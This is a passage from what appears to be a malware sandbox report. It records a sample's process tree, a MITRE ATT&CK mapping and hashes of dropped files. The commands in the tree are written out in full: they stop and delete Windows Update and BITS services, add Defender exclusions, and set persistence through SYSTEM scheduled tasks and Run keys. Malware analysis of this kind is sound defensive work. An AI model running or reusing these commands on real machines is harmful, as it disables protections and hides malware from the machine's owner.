    3⤵
    - Launches sc.exe
    PID:3056
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:2684
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:2544
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:1096
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:4208
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:1240
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:3348
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
  2⤵
  - Modifies security service
  PID:4208
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
    3⤵
    PID:4092
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:4032
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:3048
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1096
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1852
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:3248
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:4152
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1168
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:2384
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:1332
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:1552
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:3536
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:1240
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:3884
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:2920
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:2988
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:4080
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:1768
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
  2⤵
  PID:4492

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
- Executes dropped EXE
PID:424
- C:\Windows\SysWOW64\schtasks.exe
  /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
  2⤵
  - Creates scheduled task(s)
  PID:3536

C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
1⤵
- Executes dropped EXE
PID:356

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:4748

C:\Program Files\Notepad\Chrome\updater.exe
"C:\Program Files\Notepad\Chrome\updater.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:3056

C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
1⤵
- Executes dropped EXE
PID:812

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

Impair Defenses

Modify Registry

Web Service

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\content.js

Filesize
3KB

MD5
c31f14d9b1b840e4b9c851cbe843fc8f

SHA1
205e3a99dc6c0af0e2f4450ebaa49ebde8e76bb4

SHA256
03601415885fd5d8967c407f7320d53f4c9ca2ec33bbe767d73a1589c5e36c54

SHA512
2c3d7ed5384712a0013a2ebbc526e762f257e32199651192742282a9641946b6aea6235d848b1e8cb3b0f916f85d3708a14717a69cbcf081145bc634d11d75aa

Download Submit
C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\js\jquery-3.3.1.min.js

Filesize
84KB

MD5
a09e13ee94d51c524b7e2a728c7d4039

SHA1
0dc32db4aa9c5f03f3b38c47d883dbd4fed13aae

SHA256
160a426ff2894252cd7cebbdd6d6b7da8fcd319c65b70468f10b6690c45d02ef

SHA512
f8da8f95b6ed33542a88af19028e18ae3d9ce25350a06bfc3fbf433ed2b38fefa5e639cddfdac703fc6caa7f3313d974b92a3168276b3a016ceb28f27db0714a

Download Submit
C:\Program Files\nndannfdnoaiphfcbbpgkhodebpoiocf\manifest.json

Filesize
1KB

MD5
05bfb082915ee2b59a7f32fa3cc79432

SHA1
c1acd799ae271bcdde50f30082d25af31c1208c3

SHA256
04392a223cc358bc79fcd306504e8e834d6febbff0f3496f2eb8451797d28aa1

SHA512
6feea1c8112ac33d117aef3f272b1cc42ec24731c51886ed6f8bc2257b91e4d80089e8ca7ce292cc2f39100a7f662bcc5c37e5622a786f8dc8ea46b8127152f3

Download Submit
C:\ProgramData\60527957011573830059012598

Filesize
148KB

MD5
90a1d4b55edf36fa8b4cc6974ed7d4c4

SHA1
aba1b8d0e05421e7df5982899f626211c3c4b5c1

SHA256
7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c

SHA512
ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\SystemID\PersonalID.txt

Filesize
42B

MD5
7e3e9fcc42d297e9f68ca04b13a9fb44

SHA1
f263e27f040e44de2370f38499296e6dd25d84ff

SHA256
dbf4a18b623d921cef08c6a0959cc2a0d7df484ab0f208553363f901e5f6eed1

SHA512
8dd3e934d8e8acc72ac97f2d87bbda44da0cc78b48e358024840c8bf9fa3d6363b1ccbcd35f21a74a6f2474c681dc01d7c34e4d863212b1f52b5196273aa2cb5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

Filesize
2KB

MD5
ee7ad9d8f28e0558a94e667206e8a271

SHA1
b49a079526da92d55f2d1bc66659836c0f90a086

SHA256
9eeeef2cbd8192c6586ffa64114ad0c3e8e5ab3a73817e1044895517c6eba712

SHA512
0c1596e7b8e54e0cce8139a339c4c34f5f9391ce0b7051673abe7a43f174f292e0d3267b1ce1186247535941b416962b6fe63cb03855ddea254cf09fddad3223

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

Filesize
1KB

MD5
6a3b8331e801f083b403b0857ed8d574

SHA1
48d275731f1dbd0630d1ca55a1b05f149a011d1f

SHA256
98651a2da4a4613bc2a03c4128926fe6b05f1af8a7a21e1fedec75db013706a0

SHA512
7527b8857707c8822e4b7f5049ddc9b4c49933e68535690746d84b7f0187a10f36e874719bdb1bf3ba8b035568a7cbafd687b80c4621dc35552d73f7e497071d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

Filesize
488B

MD5
0305b3db57430d05d5f445593c5ecb51

SHA1
14546261edcf2438febc36c3c27d32e25dd7e71b

SHA256
3399941b48f79edf380c5e97f6f5cf62a71a44d3e252f0d448497fe0d287c47d

SHA512
ed139ed2b6c0017558cf76f3c62bb5faac664f6b7961a2fb8484bf07d9cc0e93271f89812ba7ff718b0d45fbc4696c0d5143d977d0e5f34bd0563553f9600af3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

Filesize
482B

MD5
032bf7ac2ae66511d721b7b33ad1aeae

SHA1
1e3aba287f1aa5cb4c0e1dc29a7d7758186cf6ac

SHA256
6ecdbfd7559d88c4820a72a4638b6e410f9c59ee9169af9d90717bd89f71fb11

SHA512
110acecd45aed5ab4d1ae670096b20bc8151539179a96eb102a53412a2fce2e1e7c81518638da8e27a40c6fd3463f0a5dd9d0abb864745e76ce838aaa3190470

Download Submit
C:\Users\Admin\AppData\Local\0cdf2a89-c9a3-4f89-8849-62faf5391092\build2.exe

Filesize
416KB

MD5
aa18968e6cfbdc382ada6a3ed2852085

SHA1
4a41fa1a182916d5790aa2071106b3441d64468d

SHA256
c165c8db38ef8dd8c33d103b5ee78e9ddafd8081ff0c7c035fa5251f970e6cfb

SHA512
8ffdacca2b003438fd4874e7c88beedb6ad8cf9cd5b36fda5907751e06a85a829e7d9ce7335fb59590462f78054722bccba511b21db838368c661d993000a845

Download Submit
C:\Users\Admin\AppData\Local\0cdf2a89-c9a3-4f89-8849-62faf5391092\build2.exe

Filesize
416KB

MD5
aa18968e6cfbdc382ada6a3ed2852085

SHA1
4a41fa1a182916d5790aa2071106b3441d64468d

SHA256
c165c8db38ef8dd8c33d103b5ee78e9ddafd8081ff0c7c035fa5251f970e6cfb

SHA512
8ffdacca2b003438fd4874e7c88beedb6ad8cf9cd5b36fda5907751e06a85a829e7d9ce7335fb59590462f78054722bccba511b21db838368c661d993000a845

Download Submit
C:\Users\Admin\AppData\Local\0cdf2a89-c9a3-4f89-8849-62faf5391092\build2.exe

Filesize
416KB

MD5
aa18968e6cfbdc382ada6a3ed2852085

SHA1
4a41fa1a182916d5790aa2071106b3441d64468d

SHA256
c165c8db38ef8dd8c33d103b5ee78e9ddafd8081ff0c7c035fa5251f970e6cfb

SHA512
8ffdacca2b003438fd4874e7c88beedb6ad8cf9cd5b36fda5907751e06a85a829e7d9ce7335fb59590462f78054722bccba511b21db838368c661d993000a845

Download Submit
C:\Users\Admin\AppData\Local\71d38b9a-1941-4d09-bd42-40365ca0c884\C2C8.exe

Filesize
733KB

MD5
1413865f4a87f28b94e00396de7459d2

SHA1
549c641578f2dd01c2b257fe4cb5625977da8574

SHA256
870f862ac71738d165620bfc130cf141df8552d298b7473d940cdc9dba9af44c

SHA512
ea179e4763bbe87617d2f504815d3062a17bea4bc32f11ea61cc9774824bbd231f08ff0c38367c7cccbc0cdcd0a11a8a9150cecfd6a261489dabb485ee852c54

Download Submit
C:\Users\Admin\AppData\Local\789ecd83-6a2d-4c4f-a5d6-f8776c88b343\build2.exe

Filesize
416KB

MD5
aa18968e6cfbdc382ada6a3ed2852085

SHA1
4a41fa1a182916d5790aa2071106b3441d64468d

SHA256
c165c8db38ef8dd8c33d103b5ee78e9ddafd8081ff0c7c035fa5251f970e6cfb

SHA512
8ffdacca2b003438fd4874e7c88beedb6ad8cf9cd5b36fda5907751e06a85a829e7d9ce7335fb59590462f78054722bccba511b21db838368c661d993000a845

Download Submit
C:\Users\Admin\AppData\Local\789ecd83-6a2d-4c4f-a5d6-f8776c88b343\build2.exe

Filesize
416KB

MD5
aa18968e6cfbdc382ada6a3ed2852085

SHA1
4a41fa1a182916d5790aa2071106b3441d64468d

SHA256
c165c8db38ef8dd8c33d103b5ee78e9ddafd8081ff0c7c035fa5251f970e6cfb

SHA512
8ffdacca2b003438fd4874e7c88beedb6ad8cf9cd5b36fda5907751e06a85a829e7d9ce7335fb59590462f78054722bccba511b21db838368c661d993000a845

Download Submit
C:\Users\Admin\AppData\Local\789ecd83-6a2d-4c4f-a5d6-f8776c88b343\build2.exe

Filesize
416KB

MD5
aa18968e6cfbdc382ada6a3ed2852085

SHA1
4a41fa1a182916d5790aa2071106b3441d64468d

SHA256
c165c8db38ef8dd8c33d103b5ee78e9ddafd8081ff0c7c035fa5251f970e6cfb

SHA512
8ffdacca2b003438fd4874e7c88beedb6ad8cf9cd5b36fda5907751e06a85a829e7d9ce7335fb59590462f78054722bccba511b21db838368c661d993000a845

Download Submit
C:\Users\Admin\AppData\Local\789ecd83-6a2d-4c4f-a5d6-f8776c88b343\build3.exe

Filesize
9KB

MD5
9ead10c08e72ae41921191f8db39bc16

SHA1
abe3bce01cd34afc88e2c838173f8c2bd0090ae1

SHA256
8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

SHA512
aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

Download Submit
C:\Users\Admin\AppData\Local\789ecd83-6a2d-4c4f-a5d6-f8776c88b343\build3.exe

Filesize
9KB

MD5
9ead10c08e72ae41921191f8db39bc16

SHA1
abe3bce01cd34afc88e2c838173f8c2bd0090ae1

SHA256
8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0

SHA512
aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
d1b445134c5fbda48b4c90d49d53a6da

SHA1
b5be7418f1563d1d0ca806f5349642096d63a2da

SHA256
cf49b0b3a74afbef1b7c69b192ab035236fbdae6d670b3a96f25fc6d8ca9f756

SHA512
a873078c70e00400ca07b6825cdcabcc170765b2b9c32361b4d99545617f71f2b486afad0a3d383848c294910a5b3a0edbeac489c187035d03df830dc9edc63a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
874B

MD5
19c641b3f5a2d6813cea26b9f40c1299

SHA1
370467c3c70557aa507d1ec2f00b971829c0d1aa

SHA256
db7aa785746761b2c4e507490aa47c2351f89f3a5d7b1d9e3cc25973b3d46829

SHA512
d43b25cd329dd0c57493564fb7d7ad3a270f7a1b8b2605abfbb99816789d6cf357038d052f7f9cc8e526922061c46ec3b57d8c5997df834441b46ff595ea64e8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
874B

MD5
7e65ba6f1e6c2683bb1f16a7a906fca2

SHA1
1e5c02787e8a063da60120de0efc08e85b25ed2e

SHA256
6a89f2616abf14c6c3f393c6a4bb6c3f9a392c89c6f7b958a0e26d0592a4765d

SHA512
379aed734db3790917e70ebc19d7945569dde2c691727e6e1be4c546637529cb7eb6982b8dd8211fc480223f55fa7fd1d6efed6520ba2f7f2d5bca9dd9cd8879

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
874B

MD5
29fb35e028b81f321bd56a9b17550c30

SHA1
731f31bf58c6cf87521cf43155c70cc989f3d6a5

SHA256
8ace852e51ab11b9f4f0da89cd37c72c70301528a9c9d06fbc44adef36774fcc

SHA512
f328dfe3322d1db2c0315df7be43fb605c9c990988fd6e2a85dfdc3c372d4427c5f3ca189608f5ebf5aaf2d0d23a47cde12b374ae2113811c5f74adf237793e6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
094176ddfeeaeef085e229c08732be8b

SHA1
6dd7b2af8b754146782289bbf6b15b5b6e918605

SHA256
64883c75fb0d3007b5aa1fd0d7e04c3442bd77285311d9648cffe0e43b606ea4

SHA512
1263a99e79038b4e2d708914842d90a12ef9bf1d4a858ff15a94b9f6a9f620e49a23c8e9a1bd3498b69da3eafcfb9adb338f333f1fa1085614965e12a68d68bd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
115163578bb0d7420f3fbf6c152a6a54

SHA1
7664e8dc4fad9342cedba65bb72908d0430ba144

SHA256
f7d69e00057135ac3008b3c2bb96dc8d371c2bc6b2b9d3fb0adf6484de52cef6

SHA512
9b96faaa2e3ce8be5fa9035e92650354176f4b0a3a0767f5a39245dbb93ed47277fa41d9f4d6a4b49fb212556b559230e4c79b3afeb3cb1db594c83359691035

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
fd768d632bd4b74a8dc0e258975407d0

SHA1
4451072dc463bf1790b70cc26454709b4886bd9a

SHA256
8a415f92ebad0500335a7f821f1d63f905318429d718782a8adeb9a9e5cd8030

SHA512
25c8431e294e47d14c874731ef47bda1b45f7eae4a604c63608d684aa050fb1056c6bcc8fdb130956147fcee65d64be2a87a4e7bcd907070bec7223425c03f56

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
4da2dba39668a752bfaa4d3cc4d77554

SHA1
0869bb43073706d9b9a070dd7da222a07d98dbbb

SHA256
ee69e5003b2ecd8ffe6aae0e3272ec7f6978026f1adfadb8b9a41bab4512a143

SHA512
176c87b801bbb4420cb535c11fea44aceeff59201e008ed22d2283937151445be5028309926e65291f614c9eb4a3d45a1f55c3682370921b5bfab81a96b24243

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
13KB

MD5
2b54fa2d8e76924d6574bbc6b1e585ce

SHA1
ddaeefd4e3a277b2638c90b91b976098bb7b4ce2

SHA256
d3c51c2aa090906833749675c04cb57926f666dbe9556d10fd6b0383b82142c2

SHA512
78149af762127f0a23e8396ca41fa8cbac17e103b302e4296a40a10c8a129bf867e651cb1d0adbaecd35c40ec1f88d81110a34694c8c3c322a10f489f9be99d3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\aa5d0929-0a57-4acb-a368-c451d13a2b97.tmp

Filesize
13KB

MD5
95dd091b666b67afce24d4abe084af1d

SHA1
6f0a4c2db2edd02e029cb84eacfda55bbefe0b85

SHA256
5c417e5e7a3b5fe785b8098f29679f23341f20263fd119bb95ff063d15eeff5e

SHA512
b05e101a0fc6b70fcb9be8814f71205f7b06e3ff1c3885ed410844bd2b5e61abed4a539bea5c4973eaa932629534e70ddc7a9a0fbbb0c28df59830eb7f5b52fd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
145KB

MD5
2babf4a954ba27bff826fa2b9eb29461

SHA1
d9abd503d9dcc9f05d0b6c6257ce19db4822473f

SHA256
bd0921d826f76d90aa23d32c85a64a4408231dafaaa07ccf367480376db2bd4d

SHA512
a27155747fd347ee693b5ff562566080da310fbaf356199659d058e8a5798d21856c7b8b9cb53f1daacde4c51e0a962e130eda42fc4d214313d78bfb2eb42b41

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000156001\handdiy_3.exe

Filesize
1.4MB

MD5
2644502236f017d4c97825b0d24fc434

SHA1
f18ac07f033922a89126c1ce424858a75ee17401

SHA256
aede6ea2d498e8a16c17483e53eba59866f01cb1d468ee96067042d037a6010a

SHA512
1c42cb5f0cca7e1f8b328591a19efa6834ad0f782934333e0862f8bb45a24a1a3a42ea63c556b9db328a6afaf7c5cbbab1e0a13484abc31a1b5580fda66a0f2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000156001\handdiy_3.exe

Filesize
1.4MB

MD5
2644502236f017d4c97825b0d24fc434

SHA1
f18ac07f033922a89126c1ce424858a75ee17401

SHA256
aede6ea2d498e8a16c17483e53eba59866f01cb1d468ee96067042d037a6010a

SHA512
1c42cb5f0cca7e1f8b328591a19efa6834ad0f782934333e0862f8bb45a24a1a3a42ea63c556b9db328a6afaf7c5cbbab1e0a13484abc31a1b5580fda66a0f2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000156001\handdiy_3.exe

Filesize
1.4MB

MD5
2644502236f017d4c97825b0d24fc434

SHA1
f18ac07f033922a89126c1ce424858a75ee17401

SHA256
aede6ea2d498e8a16c17483e53eba59866f01cb1d468ee96067042d037a6010a

SHA512
1c42cb5f0cca7e1f8b328591a19efa6834ad0f782934333e0862f8bb45a24a1a3a42ea63c556b9db328a6afaf7c5cbbab1e0a13484abc31a1b5580fda66a0f2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000157001\sqlcmd.exe

Filesize
143KB

MD5
f5b4002365ec9f90dbe09fdb55a39c4d

SHA1
66f4890785e2ae03030f7415ad17f2085ae26b21

SHA256
51ad039741a89ea696e1615b9f73ae6b9d32fc370b569f8ca8c97758923420e6

SHA512
3096e6bbce63db594ac62be61acc663e39ca6fd36ef9594dbdeae502ebdd57bea2d5ec6f2374c134b0eb42747900fffab7ad84be934a430463a91bdcce6df2d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000157001\sqlcmd.exe

Filesize
143KB

MD5
f5b4002365ec9f90dbe09fdb55a39c4d

SHA1
66f4890785e2ae03030f7415ad17f2085ae26b21

SHA256
51ad039741a89ea696e1615b9f73ae6b9d32fc370b569f8ca8c97758923420e6

SHA512
3096e6bbce63db594ac62be61acc663e39ca6fd36ef9594dbdeae502ebdd57bea2d5ec6f2374c134b0eb42747900fffab7ad84be934a430463a91bdcce6df2d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000157001\sqlcmd.exe

Filesize
143KB

MD5
f5b4002365ec9f90dbe09fdb55a39c4d

SHA1
66f4890785e2ae03030f7415ad17f2085ae26b21

SHA256
51ad039741a89ea696e1615b9f73ae6b9d32fc370b569f8ca8c97758923420e6

SHA512
3096e6bbce63db594ac62be61acc663e39ca6fd36ef9594dbdeae502ebdd57bea2d5ec6f2374c134b0eb42747900fffab7ad84be934a430463a91bdcce6df2d2

Download Submit
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe

Filesize
244KB

MD5
43a3e1c9723e124a9b495cd474a05dcb

SHA1
d293f427eaa8efc18bb8929a9f54fb61e03bdd89

SHA256
619bbbc9e9ddd1f6b7961cacb33d99c8f558499a33751b28d91085aab8cb95ab

SHA512
6717d6be0f25d66ba3689b703b9f1360c172138faa0172168c531f55eb217050c03a41396b7a440e899974d71c2f42b41d07db0ef97751c420facfae1550bfa7

Download Submit
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe

Filesize
244KB

MD5
43a3e1c9723e124a9b495cd474a05dcb

SHA1
d293f427eaa8efc18bb8929a9f54fb61e03bdd89

SHA256
619bbbc9e9ddd1f6b7961cacb33d99c8f558499a33751b28d91085aab8cb95ab

SHA512
6717d6be0f25d66ba3689b703b9f1360c172138faa0172168c531f55eb217050c03a41396b7a440e899974d71c2f42b41d07db0ef97751c420facfae1550bfa7

Download Submit
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe

Filesize
244KB

MD5
43a3e1c9723e124a9b495cd474a05dcb

SHA1
d293f427eaa8efc18bb8929a9f54fb61e03bdd89

SHA256
619bbbc9e9ddd1f6b7961cacb33d99c8f558499a33751b28d91085aab8cb95ab

SHA512
6717d6be0f25d66ba3689b703b9f1360c172138faa0172168c531f55eb217050c03a41396b7a440e899974d71c2f42b41d07db0ef97751c420facfae1550bfa7

Download Submit
C:\Users\Admin\AppData\Local\Temp\358B.exe

Filesize
4.4MB

MD5
326665e5f77114ea09307e4cd002b82f

SHA1
ae7a70a90eb1e89e91aa8a6cad113c73ee5b826d

SHA256
4244acb6f883e56baebf36785ce5b2c1affc38b46472cd2795df3405d98d2ac0

SHA512
c941b7486fb9dcc6c5a50fc653f8d090654610749e8061af5a4089ea6daf8a3cf807ac866d071c384e437a02b7baf20b6b6958b3a4796b2f63431589fd7f2b37

Download Submit
C:\Users\Admin\AppData\Local\Temp\358B.exe

Filesize
4.4MB

MD5
326665e5f77114ea09307e4cd002b82f

SHA1
ae7a70a90eb1e89e91aa8a6cad113c73ee5b826d

SHA256
4244acb6f883e56baebf36785ce5b2c1affc38b46472cd2795df3405d98d2ac0

SHA512
c941b7486fb9dcc6c5a50fc653f8d090654610749e8061af5a4089ea6daf8a3cf807ac866d071c384e437a02b7baf20b6b6958b3a4796b2f63431589fd7f2b37

Download Submit
C:\Users\Admin\AppData\Local\Temp\426D.exe

Filesize
4.4MB

MD5
326665e5f77114ea09307e4cd002b82f

SHA1
ae7a70a90eb1e89e91aa8a6cad113c73ee5b826d

SHA256
4244acb6f883e56baebf36785ce5b2c1affc38b46472cd2795df3405d98d2ac0

SHA512
c941b7486fb9dcc6c5a50fc653f8d090654610749e8061af5a4089ea6daf8a3cf807ac866d071c384e437a02b7baf20b6b6958b3a4796b2f63431589fd7f2b37

Download Submit
C:\Users\Admin\AppData\Local\Temp\426D.exe

Filesize
4.4MB

MD5
326665e5f77114ea09307e4cd002b82f

SHA1
ae7a70a90eb1e89e91aa8a6cad113c73ee5b826d

SHA256
4244acb6f883e56baebf36785ce5b2c1affc38b46472cd2795df3405d98d2ac0

SHA512
c941b7486fb9dcc6c5a50fc653f8d090654610749e8061af5a4089ea6daf8a3cf807ac866d071c384e437a02b7baf20b6b6958b3a4796b2f63431589fd7f2b37

Download Submit
C:\Users\Admin\AppData\Local\Temp\4433.exe

Filesize
734KB

MD5
073ee21723d93c61667c7ef162c3877a

SHA1
